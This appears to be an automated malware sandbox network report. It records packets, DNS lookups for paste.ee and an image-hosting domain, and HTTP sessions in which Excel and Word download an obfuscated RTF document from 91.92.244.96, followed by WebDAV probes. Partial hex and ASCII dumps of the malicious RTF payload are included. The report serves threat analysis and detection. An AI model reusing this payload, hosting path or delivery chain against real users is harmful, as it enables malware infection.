Feb 13, 2024 15:08:06.711739063 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.711750984 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.711757898 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.711780071 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.711810112 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.713170052 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.713196993 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.713232040 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.713241100 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.713253021 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.714121103 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.714147091 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.714178085 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.714184999 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.714196920 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.714390993 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.714416027 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.714441061 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.714447975 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.714468002 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.714483976 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.714509010 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.714521885 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.714529991 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.714556932 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.714556932 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.715637922 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.715692043 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.715701103 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.715718985 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.715769053 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.715775967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.715909958 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.715939045 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.715954065 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.715961933 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.716029882 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.716031075 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.716491938 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.716543913 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.716552019 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.716571093 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.716603041 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.716634989 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.716641903 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.716659069 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.716696024 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.718210936 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.718239069 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.718285084 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.718295097 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.718303919 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.718373060 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.718413115 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.718425035 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.718434095 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.718466997 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.718492985 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.718499899 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.718532085 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.718548059 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.718554020 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.718575001 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.718575001 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.718617916 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.718662024 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.718664885 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.718677998 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.718679905 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.718713045 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.719085932 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.719121933 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.719137907 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.719146013 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.719166994 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.719201088 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.719224930 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.719237089 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.722047091 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:09.248970985 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:08:09.249042034 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:09.251471043 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:09.444853067 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:08:50.808001041 CET	49165	80	192.168.2.22	91.92.244.96

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 13, 2024 15:08:02.101300955 CET	54562	53	192.168.2.22	8.8.8.8
Feb 13, 2024 15:08:02.206566095 CET	53	54562	8.8.8.8	192.168.2.22
Feb 13, 2024 15:08:02.214972019 CET	52917	53	192.168.2.22	8.8.8.8
Feb 13, 2024 15:08:02.321139097 CET	53	52917	8.8.8.8	192.168.2.22
Feb 13, 2024 15:08:04.923386097 CET	62751	53	192.168.2.22	8.8.8.8
Feb 13, 2024 15:08:05.029815912 CET	53	62751	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 13, 2024 15:08:02.101300955 CET	192.168.2.22	8.8.8.8	0xb2d6	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Feb 13, 2024 15:08:02.214972019 CET	192.168.2.22	8.8.8.8	0xdf7c	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Feb 13, 2024 15:08:04.923386097 CET	192.168.2.22	8.8.8.8	0x568e	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 13, 2024 15:08:02.206566095 CET	8.8.8.8	192.168.2.22	0xb2d6	No error (0)	paste.ee	104.21.84.67	A (IP address)	IN (0x0001)	false
Feb 13, 2024 15:08:02.206566095 CET	8.8.8.8	192.168.2.22	0xb2d6	No error (0)	paste.ee	172.67.187.200	A (IP address)	IN (0x0001)	false
Feb 13, 2024 15:08:02.321139097 CET	8.8.8.8	192.168.2.22	0xdf7c	No error (0)	paste.ee	172.67.187.200	A (IP address)	IN (0x0001)	false
Feb 13, 2024 15:08:02.321139097 CET	8.8.8.8	192.168.2.22	0xdf7c	No error (0)	paste.ee	104.21.84.67	A (IP address)	IN (0x0001)	false
Feb 13, 2024 15:08:05.029815912 CET	8.8.8.8	192.168.2.22	0x568e	No error (0)	uploaddeimagens.com.br	172.67.215.45	A (IP address)	IN (0x0001)	false
Feb 13, 2024 15:08:05.029815912 CET	8.8.8.8	192.168.2.22	0x568e	No error (0)	uploaddeimagens.com.br	104.21.45.138	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

uploaddeimagens.com.br

91.92.244.96

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49160	91.92.244.96	80	1404	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
Feb 13, 2024 15:07:50.256541014 CET	433	OUT	GET /LEO/CLO/microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doC HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.92.244.96 Connection: Keep-Alive
Feb 13, 2024 15:07:50.455319881 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 14:07:50 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Tue, 13 Feb 2024 00:44:29 GMT ETag: "11148-61138b265f87f" Accept-Ranges: bytes Content-Length: 69960 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword Data Raw: 7b 5c 72 74 0d 09 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 62 57 4d 6f 64 65 42 57 35 33 39 35 33 36 33 35 32 20 5c 21 7d 0d 7b 5c 36 34 34 33 33 37 38 38 37 3f 5f 5b 37 a7 b5 23 30 29 34 3f 5d 40 3c 25 32 3f 5b 3a 40 5b 25 3e 3c 5d 23 3e 26 39 b5 a7 26 2a 37 39 3f 21 39 60 b5 5b 3f 39 32 3f 2c 2d a7 7c 2f 37 39 2a 2c 3a 21 5f 5e 24 3e 2a 5e 37 25 25 33 5e 3b 5d 3f a7 26 31 37 3c 31 25 2b 32 b0 35 21 3f 26 3f 40 2b 34 28 33 34 31 26 29 3f 30 3f 38 2b 5e b5 26 5b 40 3f 24 5d 5e 3b 34 3b 25 21 39 40 38 2b 39 7e 37 5f 28 36 33 36 3e 30 23 2a 23 28 5b 29 39 b5 3f 2a 2d 35 b0 38 32 3a 37 2e 3f 2b 3f 2b 3f 30 26 5e 26 39 3f b5 39 3f 2d 23 3f 40 b5 3d 40 31 39 34 a7 32 36 2d 2a 21 28 2f a7 24 36 38 2f 25 3f 3e 35 3f 25 26 28 38 b0 3c 26 2d 3b 29 2c 5d 5d 28 34 5e 26 2f 30 2d 33 5b 32 21 3e 40 30 24 25 28 29 3f 25 32 7c 24 3f 3f 28 b5 3f 40 33 5f 39 3f 7c 33 b0 60 3f 5d b0 2f 7c 21 40 40 7e 34 2e 37 23 23 2d 28 2e 3f 7c 3f 2d 25 60 33 3f 5b 21 2a 3b 29 25 29 38 31 a7 3a 60 35 25 3d 3f 2b 25 3f 35 23 24 b5 2d 3f 21 3f 28 3f 3e 3b 3f 3f 3f b0 2e 36 3a 2d 3f 60 3f 38 a7 5b 3c 3e 25 3b 3c b5 25 5b 37 b5 7e 26 b0 3f 27 3b 3f 33 25 3a b0 5f 25 60 3f 3f 36 3f 5d 2f 27 40 2a 26 24 38 3f 31 40 3e 27 25 3f 7e 28 3f 21 3f 24 2b 3f 23 3f 2e 2e 5f 38 3c 31 3f 36 b5 29 5d 7e 3a 3d 25 2e 2a 3f 37 b5 29 29 a7 5e 2e 3f 2b 60 5e 2b 33 38 29 b5 31 2e a7 2b 3f 39 25 36 28 3f 26 25 2c 31 33 3b 27 2b 38 5e 36 25 3f 2c 21 40 b5 3f b5 2e 7e 3f 2c 37 3f 2a 2f 3d 40 26 39 28 34 b0 2a 34 2d 3e 27 32 39 26 21 b5 25 5f 38 3c 3c 3f 5b 3c 23 25 34 3f 3f 35 3f 39 a7 3a 27 60 3e 34 3b 25 3d b0 2d 2e 3f 27 b0 2f 30 3d 3b 2f 2c 3f 2c 2d 21 36 30 28 2e 3f 5f 2c 5f b5 37 40 3e 39 5d 37 b0 25 23 29 33 25 31 25 b5 24 35 24 7e 3f 3e 2c a7 a7 34 5d 3d 3f 2e 35 b5 3e 38 5b 2a 3f 3b 3a 36 5d 26 3e 3c 24 3e 2e 3b 24 7e 40 36 25 38 26 3f 3f 31 35 5b 2c 35 25 37 5f 5e 23 2e 25 38 b0 2b 60 24 3b 5f 31 3f 7c 5b 2a 2c 2e 7e 25 5b 3c 7e 2e b5 2a 2e 38 40 38 30 24 28 35 3c 33 29 33 60 3f 5d 40 40 5d 3f 2a 7e 35 2f 40 3f 3d 29 28 5e 34 37 3f 31 39 25 21 3b 2f 5b 38 28 b0 a7 2a 32 2e 35 3f 5b 29 2f a7 34 39 3b 35 3f 3f 3f 29 35 39 21 33 36 3c 2b 3f 3c 30 3a 2f 25 29 2d 39 5f 25 b0 3f 3f 3c 21 3b 34 24 b0 3e 7c 35 25 3f b0 60 5b 3f 3f 5d 25 31 28 38 32 3c 33 5d 37 3b 37 5d 3f 2e 25 33 24 33 2b 5b 2b 33 b5 2c 3a 5e 23 23 30 3b 3e b5 a7 28 26 3b 2f 3e 28 2f 5d 36 3e 38 25 30 38 2d 25 40 5e 37 36 3f 3d 26 34 3a 3f 40 3f 3d 25 60 2b 2d 36 33 5d 3c 2f 5b 40 25 7c 36 3f 35 3e 2d 7c 5d a7 28 2e 27 29 2c 5b b0 2e b5 2c 33 30 2b 33 28 a7 5d 3d 33 3f 2c b5 35 3f 2a 33 40 39 2c 5d 2b 37 2d 2a 40 a7 b0 3a 5b 34 25 a7 5b 5b 5b 26 3f 3e 29 3a 2e 3c 34 3f 26 25 3f 2f 5e 3f 3c 3f 3b 5d 37 b0 a7 2f 3f 5d 21 3a 35 a7 35 36 2c 25 21 5f 3f 2a 3f 25 35 5e 23 3f 24 60 37 5e 40 3c a7 3e 5d 2a 2c 5b 24 3d 26 26 26 2f 33 3d 60 25 31 3a b5 25 60 31 b0 38 3d 25 3f 32 36 3f 5e 24 39 27 2b 31 30 60 31 25 35 5d 35 28 5d 3c 5b 27 2e Data Ascii: {\rt{\\bWModeBW539536352 \!}{\644337887?_[7#0)4?]@<%2?[:@[%><]#>&9&79?!9`[?92?,-\|/79,:!_^$>^7%%3^;]?&17<1%+25!?&?@+4(341&)?0?8+^&[@?$]^;4;%!9@8+9~7_(636>0##([)9?-582:7.?+?+?0&^&9?9?-#?@=@19426-!(/$68/%?>5?%&(8<&-;),]](4^&/0-3[2!>@0$%()?%2\|$??(?@3_9?\|3`?]/\|!@@~4.7##-(.?\|?-%`3?[!;)%)81:`5%=?+%?5#$-?!?(?>;???.6:-?`?8[<>%;<%[7~&?';?3%:_%`??6?]/'@&$8?1@>'%?~(?!?$+?#?.._8<1?6)]~:=%.?7))^.?+`^+38)1.+?9%6(?&%,13;'+8^6%?,!@?.~?,7?/=@&9(44->'29&!%_8<<?[<#%4??5?9:'`>4;%=-.?'/0=;/,?,-!60(.?_,_7@>9]7%#)3%1%$5$~?>,4]=?.5>8[?;:6]&><$>.;$~@6%8&??15[,5%7_^#.%8+`$;_1?\|[,.~%[<~..8@80$(5<3)3`?]@@]?~5/@?=)(^47?19%!;/[8(2.5?[)/49;5???)59!36<+?<0:/%)-9_%??<!;4$>\|5%?`[??]%1(82<3]7;7]?.%3$3+[+3,:^##0;>(&;/>(/]6>8%08-%@^76?=&4:?@?=%`+-63]</[@%\|6?5>-\|](.'),[.,30+3(]=3?,5?3@9,]+7-@:[4%[[[&?>):.<4?&%?/^?<?;]7/?]!:556,%!_??%5^#?$`7^@<>]*,[$=&&&/3=`%1:%`18=%?26?^$9'+10`1%5]5(]<['.
Feb 13, 2024 15:07:50.455337048 CET	1286	IN	Data Raw: 3e 5b 2f 24 24 b0 33 25 3f 7c 30 31 60 3f 5d 34 3d 3d 2d b5 26 60 b0 3f 5b 34 37 3f 3f 23 32 26 3c 35 3f 5d 36 3f 23 26 25 2f 2c 3c 5b 60 b0 25 40 3f 32 5d 29 35 a7 24 28 3f 3f 3f 3c 28 23 3f 3b 3e 3f 5e 3f 37 5e 21 2a 2e 31 36 2a 5f 26 b5 3a 37 Data Ascii: >[/$$3%?\|01`?]4==-&`?[47??#2&<5?]6?#&%/,<[`%@?2])5$(???<(#?;>?^?7^!.16_&:701>&.;?,+&(%./'+\|??9;-1%=;@7?70\|62#?~)/.~+/0`^/3%(+~&1+==??^)~:%78=(-:???+_7?8`:?.??/7%~(0$<94')\|%-&-1+\|`%^1*3#772'?,4^?7=+).?/!#?+~6&#)9?0&[,332
Feb 13, 2024 15:07:50.455357075 CET	1286	IN	Data Raw: 21 a7 39 32 3e 33 3a 3d 28 33 33 28 3f 2e 5b b0 25 7c b5 2d 32 3f 3d 3e 23 40 3f 3b 2a 5d 3f 3a 37 3f 27 2d 40 2f 3f 3b 3f 5e 2c 2b 38 3f 5e 5b 3f 3f 25 60 21 31 3f 5d 36 33 3b 38 36 7e 5d 28 21 36 60 7c 30 a7 2d 31 2b 3e 60 5d 5f 3e 3f 30 29 25 Data Ascii: !92>3:=(33(?.[%\|-2?=>#@?;]?:7?'-@/?;?^,+8?^[??%`!1?]63;86~](!6`\|0-1+>`]_>?0)%-?<?28%%`@?0-(1?`(2[)2/,;(+%3??=?6`[$!+',,>8$<5!==<17^.2<9>&>$??.%&2=_97+`#7^_.?3>?%%8~--4,[4#(%+?#34=;%(((94+$1?#('3%7=>?44-~.1]%9<'3<2,?%`~&09
Feb 13, 2024 15:07:50.455367088 CET	1286	IN	Data Raw: 24 2f 3d 25 37 3d 39 2a 5d 40 3f 29 5e 36 25 2d 25 30 24 3f 21 2f 30 a7 34 2a 3b 60 36 3b 3e 31 29 3c 25 2d 40 31 60 29 36 28 7e 3f 7c 36 7e 7c 2a 3f b0 25 39 3f b5 26 34 2e 2d 60 21 3c 3f 35 29 38 34 2e 5f 2e 36 5e 3f 5b 3f 7e 3b 33 23 23 5d 2f Data Ascii: $/=%7=9]@?)^6%-%0$?!/04;`6;>1)<%-@1`)6(~?\|6~\|?%9?&4.-`!<?5)84._.6^?[?~;3##]/9''$_+08[#$`4%\|_]]<;&3/.$9/,<.?30>?_'?^,529/?5+,8[++@39\|`-4)'=+3?[3?^@;$6;9=1\|_?.%>!?:`63?\|][]=#[61^`?<6+[?>\|;5230)+:~4-:39(44!_:?1?7~-?`%($#?
Feb 13, 2024 15:07:50.455379009 CET	1286	IN	Data Raw: 33 25 5b 5d b5 3d 24 25 3f 33 3f 35 40 29 21 21 36 b0 3b 5d 23 3e a7 5e 3a 5b 40 34 31 60 a7 3f 2e 37 b5 28 5e 5b 5e 7c 2a 3a 36 33 25 39 2a 25 2f 39 b5 b5 3a 2d 7e 40 35 21 2d 3c a7 3d 35 b0 34 5e 5b 3f 3c 38 26 5e 3f 3e 34 3c 29 3d 3f 5d 26 3b Data Ascii: 3%[]=$%?3?5@)!!6;]#>^:[@41`?.7(^[^\|:63%9%/9:-~@5!-<=54^[?<8&^?>4<)=?]&;,!+]143+;1\|=_@%\|%4+@<==)9$&1`:]_3/<^$/?/2?%#%?%73'<\|(,97%?%_\|0.#6&?,24-9>1'4~<=]!+%;>-%.&0$36<$>0~%(9<'(7?'_=:49-?9%+5..0?6,,1_>';`)???3$<'/&8(@
Feb 13, 2024 15:07:50.455391884 CET	1286	IN	Data Raw: a7 2f 28 3f 2f 3f 21 3f 2a 5e 23 3c 5d 30 21 27 5b 25 5b 36 2b 5d a7 60 36 3e 3f 3f 2b a7 36 2b 34 3f 28 5f 34 36 2f b0 28 35 5f 60 2e 3f 39 2c 7c 32 25 37 27 23 28 3d 23 b5 2b b0 7e 2c 5e b5 25 30 29 34 24 24 b5 3a 23 25 7e 3f 3d 28 3b 3f 3f 37 Data Ascii: /(?/?!?^#<]0!'[%[6+]`6>??+6+4?(_46/(5_`.?9,\|2%7'#(=#+~,^%0)4$$:#%~?=(;??7+?[6%04\|\|9?7~;<5#5?>`5]1\|?&3:!?!1)?(1,_1;\|&/##:>'+6=3_80#`?52\|%=[(]7`_]8`?#6?4/883`7@=74'[)'?'[?#?@1#?6,&%0,\|;?%[+_'22`4877?+>&;?0>%9~-%,[-$::05&*_
Feb 13, 2024 15:07:50.455400944 CET	1286	IN	Data Raw: 5c 6f 62 6a 77 31 31 31 36 5c 6f 62 6a 68 38 32 38 30 7b 5c 2a 5c 6f 62 6a 75 70 64 61 74 65 37 33 33 32 37 33 33 32 5c 2a 5c 6f 62 6a 64 61 74 61 34 39 39 34 33 34 7b 5c 65 6e 73 70 61 63 65 35 39 34 30 32 39 33 38 20 5c 62 69 6e 30 5c 38 39 34 Data Ascii: \objw1116\objh8280{\\objupdate73327332\\objdata499434{\enspace59402938 \bin0\894716675196395750}{\*\fLockVerticies628433580 \bin0\425648506619591469}\margl95833155214575\yts199483\'
Feb 13, 2024 15:07:50.455409050 CET	1286	IN	Data Raw: 09 09 20 20 09 30 20 09 20 20 20 09 20 20 09 09 20 09 20 20 09 20 20 09 09 20 20 09 30 30 09 09 20 09 20 20 09 20 20 09 20 20 20 09 09 20 20 09 09 20 20 09 30 30 30 09 09 09 20 20 20 20 20 09 09 20 09 20 09 20 20 20 09 09 20 20 09 30 0a 0d 0a 0a Data Ascii: 0 00 000 0000000 000000 00 00 00 0
Feb 13, 2024 15:07:50.455426931 CET	1286	IN	Data Raw: 09 09 20 20 20 09 09 20 20 09 09 09 09 66 66 66 20 09 09 20 09 09 09 09 20 20 20 09 20 20 09 09 20 20 09 09 09 09 66 09 09 20 20 20 09 09 09 09 20 09 09 09 09 20 09 20 09 20 09 20 09 66 66 66 0d 0d 0d 0a 66 66 66 0d 0d 0d 0a 66 0d 0a 0d 0a 66 66 Data Ascii: fff f ffffffffff fffffff ffffffffffffffffffff ff ff
Feb 13, 2024 15:07:50.455437899 CET	1286	IN	Data Raw: 66 66 0d 0d 0d 0d 66 09 20 20 20 09 09 20 20 09 09 20 20 09 09 20 09 09 09 09 20 20 09 66 0a 0d 0d 0d 66 0d 0d 0d 0d 66 66 0d 0d 0d 0d 66 66 66 66 66 0d 0a 0d 0d 66 0d 0a 0d 0d 66 66 66 66 20 20 09 20 20 20 09 09 09 09 09 09 20 09 09 20 09 09 09 Data Ascii: fff ffffffffffffff fffff fff fff ff f ffffff
Feb 13, 2024 15:07:50.649225950 CET	1286	IN	Data Raw: 20 09 20 09 09 09 20 20 09 09 20 09 66 66 66 66 66 0d 0d 0d 0d 66 0d 0d 0a 0d 66 0a 0d 0a 0d 66 66 66 66 66 66 0d 0d 0d 0d 66 66 0a 0a 0a 0d 66 66 66 66 0d 0d 0a 0d 66 66 09 09 09 09 20 09 20 20 20 09 20 09 20 09 09 09 20 20 09 09 20 09 66 66 09 Data Ascii: fffffffffffffffffffff ff fffff f fff f ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49161	91.92.244.96	80	848	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Feb 13, 2024 15:07:51.325299978 CET	142	OUT	OPTIONS /LEO/CLO/ HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: 91.92.244.96 Content-Length: 0 Connection: Keep-Alive
Feb 13, 2024 15:07:51.523401976 CET	253	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 14:07:51 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49162	91.92.244.96	80	848	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Feb 13, 2024 15:07:52.065134048 CET	227	OUT	HEAD /LEO/CLO/microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doC HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: 91.92.244.96
Feb 13, 2024 15:07:52.262053013 CET	322	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 14:07:52 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Tue, 13 Feb 2024 00:44:29 GMT ETag: "11148-61138b265f87f" Accept-Ranges: bytes Content-Length: 69960 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.22	49164	91.92.244.96	80

Timestamp	Bytes transferred	Direction	Data
Feb 13, 2024 15:07:55.863343954 CET	136	OUT	OPTIONS /LEO/CLO HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: 91.92.244.96
Feb 13, 2024 15:07:56.058785915 CET	627	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 13 Feb 2024 14:07:55 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Location: http://91.92.244.96/LEO/CLO/ Content-Length: 338 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 39 31 2e 39 32 2e 32 34 34 2e 39 36 2f 4c 45 4f 2f 43 4c 4f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 39 32 2e 32 34 34 2e 39 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://91.92.244.96/LEO/CLO/">here</a>.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 91.92.244.96 Port 80</address></body></html>
Feb 13, 2024 15:07:56.061444998 CET	137	OUT	OPTIONS /LEO/CLO/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: 91.92.244.96
Feb 13, 2024 15:07:56.263819933 CET	252	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 14:07:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
